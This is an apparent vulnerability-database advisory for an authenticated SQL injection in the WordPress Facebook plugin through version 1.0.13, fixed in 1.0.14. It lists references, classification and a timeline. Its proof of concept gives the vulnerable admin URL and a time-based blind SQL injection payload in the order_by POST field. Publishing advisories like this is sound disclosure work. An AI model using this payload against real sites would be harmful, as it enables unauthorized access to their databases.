WordPress Facebook <= 1.0.13 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
http://www.defensecode.com/advisories/DC-2017-04-011_WordPress_Facebook_Plugin_Advisory.pdf
Proof of Concept
Vulnerable POST URL:
http://vulnerablesite.com/wp-admin/admin.php?page=Spider_Facebook_manage

Vulnerable POST Body:
search_events_by_title=&page_number=1&serch_or_not=&asc_or_desc=1&order_by=type AND (SELECT * FROM (SELECT(SLEEP(5)))DefenseCode)

Affects Plugin

fixed in version 1.0.14

References

URL http://www.defensecode.com/advisories/DC-2017-04-011_WordPress_Facebook_Plugin_Advisory.pdf
URL https://plugins.trac.wordpress.org/changeset/1631122/spider-facebook

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Neven Biruski
Submitter Website http://www.defensecode.com
Submitter Twitter https://twitter.com/DefenseCode/
Views 151
Verified No
WPVDB ID 8806

Timeline

Publicly Published 2017-05-02 (5 months ago)
Added 2017-05-05 (5 months ago)
Last Updated 2017-05-05 (5 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.